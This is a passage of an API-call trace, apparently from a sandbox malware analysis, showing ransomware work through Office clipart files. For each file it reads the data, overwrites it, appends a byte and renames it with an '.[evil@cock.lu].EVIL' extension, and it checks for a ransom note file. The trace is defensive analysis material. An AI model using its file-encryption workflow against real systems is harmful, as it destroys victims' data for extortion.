lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2d21, lpOverlapped=0x0) returned 1 [0154.257] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.257] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.257] _errno () returned 0x84b1160840 [0154.257] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.257] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d40, lpOverlapped=0x0) returned 1 [0154.257] CloseHandle (hObject=0x1a8) returned 1 [0154.257] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.258] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.258] __uncaught_exception () returned 0x84b1160800 [0154.258] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.258] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0289430.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0289430.jpg.[evil@cock.lu].evil")) returned 1 [0154.259] ??_V@YAXPEAX@Z () returned 0x1 [0154.262] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG", dwFileAttributes=0x200) returned 0 [0154.262] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.262] wcsstr (_Str="J0290548.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.262] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF") returned 69 [0154.262] wcscmp (_String1="J0290548.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.262] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0290548.WMF") returned 0x0 [0154.262] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF") returned 0x45 [0154.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0290548.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.264] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9e8a, lpOverlapped=0x0) returned 1 [0154.291] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.291] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.291] _errno () returned 0x84b1160840 [0154.291] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.291] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x9ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9ea0, lpOverlapped=0x0) returned 1 [0154.291] CloseHandle (hObject=0x1a8) returned 1 [0154.291] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.292] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.292] __uncaught_exception () returned 0x84b1160800 [0154.292] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.292] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0290548.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0290548.wmf.[evil@cock.lu].evil")) returned 1 [0154.293] ??_V@YAXPEAX@Z () returned 0x1 [0154.296] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF", dwFileAttributes=0x200) returned 0 [0154.297] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.297] wcsstr (_Str="J0291794.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.297] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF") returned 69 [0154.297] wcscmp (_String1="J0291794.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.297] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0291794.WMF") returned 0x0 [0154.297] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF") returned 0x45 [0154.297] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0291794.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.299] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2590, lpOverlapped=0x0) returned 1 [0154.314] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.314] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.314] _errno () returned 0x84b1160840 [0154.314] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.314] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x25a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x25a0, lpOverlapped=0x0) returned 1 [0154.315] CloseHandle (hObject=0x1a8) returned 1 [0154.315] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.315] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.315] __uncaught_exception () returned 0x84b1160800 [0154.315] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.315] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0291794.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0291794.wmf.[evil@cock.lu].evil")) returned 1 [0154.316] ??_V@YAXPEAX@Z () returned 0x1 [0154.319] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF", dwFileAttributes=0x200) returned 0 [0154.319] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.319] wcsstr (_Str="J0292248.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.319] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF") returned 69 [0154.319] wcscmp (_String1="J0292248.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.319] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0292248.WMF") returned 0x0 [0154.319] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF") returned 0x45 [0154.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292248.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.321] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x20e4, lpOverlapped=0x0) returned 1 [0154.328] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.328] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.328] _errno () returned 0x84b1160840 [0154.329] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.329] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x2100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2100, lpOverlapped=0x0) returned 1 [0154.329] CloseHandle (hObject=0x1a8) returned 1 [0154.329] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.329] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.329] __uncaught_exception () returned 0x84b1160800 [0154.329] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.329] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292248.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292248.wmf.[evil@cock.lu].evil")) returned 1 [0154.330] ??_V@YAXPEAX@Z () returned 0x1 [0154.333] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF", dwFileAttributes=0x200) returned 0 [0154.333] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.333] wcsstr (_Str="J0292270.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.333] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF") returned 69 [0154.333] wcscmp (_String1="J0292270.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.333] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0292270.WMF") returned 0x0 [0154.333] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF") returned 0x45 [0154.333] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292270.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.335] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7aa6, lpOverlapped=0x0) returned 1 [0154.342] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.342] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.342] _errno () returned 0x84b1160840 [0154.343] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.343] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x7ac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7ac0, lpOverlapped=0x0) returned 1 [0154.343] CloseHandle (hObject=0x1a8) returned 1 [0154.343] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.343] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.343] __uncaught_exception () returned 0x84b1160800 [0154.343] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.343] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292270.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292270.wmf.[evil@cock.lu].evil")) returned 1 [0154.344] ??_V@YAXPEAX@Z () returned 0x1 [0154.347] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF", dwFileAttributes=0x200) returned 0 [0154.347] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.347] wcsstr (_Str="J0292272.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.347] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF") returned 69 [0154.347] wcscmp (_String1="J0292272.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.347] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0292272.WMF") returned 0x0 [0154.347] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF") returned 0x45 [0154.347] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292272.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.349] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b64, lpOverlapped=0x0) returned 1 [0154.356] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.356] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.356] _errno () returned 0x84b1160840 [0154.356] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.356] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b80, lpOverlapped=0x0) returned 1 [0154.356] CloseHandle (hObject=0x1a8) returned 1 [0154.356] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.357] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.357] __uncaught_exception () returned 0x84b1160800 [0154.357] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.448] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292272.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292272.wmf.[evil@cock.lu].evil")) returned 1 [0154.449] ??_V@YAXPEAX@Z () returned 0x1 [0154.452] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF", dwFileAttributes=0x200) returned 0 [0154.452] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.452] wcsstr (_Str="J0292278.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.452] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF") returned 69 [0154.452] wcscmp (_String1="J0292278.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.452] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0292278.WMF") returned 0x0 [0154.452] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF") returned 0x45 [0154.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292278.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.454] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3658, lpOverlapped=0x0) returned 1 [0154.456] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.456] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.456] _errno () returned 0x84b1160840 [0154.456] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.456] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3660, lpOverlapped=0x0) returned 1 [0154.456] CloseHandle (hObject=0x1a8) returned 1 [0154.457] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.457] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.457] __uncaught_exception () returned 0x84b1160800 [0154.457] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.457] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292278.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292278.wmf.[evil@cock.lu].evil")) returned 1 [0154.458] ??_V@YAXPEAX@Z () returned 0x1 [0154.461] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF", dwFileAttributes=0x200) returned 0 [0154.461] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.461] wcsstr (_Str="J0292286.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.461] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF") returned 69 [0154.461] wcscmp (_String1="J0292286.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.461] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0292286.WMF") returned 0x0 [0154.461] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF") returned 0x45 [0154.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292286.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.463] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b56, lpOverlapped=0x0) returned 1 [0154.467] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.467] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.467] _errno () returned 0x84b1160840 [0154.467] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.467] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4b60, lpOverlapped=0x0) returned 1 [0154.468] CloseHandle (hObject=0x1a8) returned 1 [0154.468] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.468] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.468] __uncaught_exception () returned 0x84b1160800 [0154.468] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.468] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292286.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292286.wmf.[evil@cock.lu].evil")) returned 1 [0154.469] ??_V@YAXPEAX@Z () returned 0x1 [0154.472] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF", dwFileAttributes=0x200) returned 0 [0154.473] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.473] wcsstr (_Str="J0293800.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.473] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF") returned 69 [0154.473] wcscmp (_String1="J0293800.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.473] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0293800.WMF") returned 0x0 [0154.473] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF") returned 0x45 [0154.473] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293800.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.475] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12a6, lpOverlapped=0x0) returned 1 [0154.483] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.483] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.483] _errno () returned 0x84b1160840 [0154.483] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.483] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, 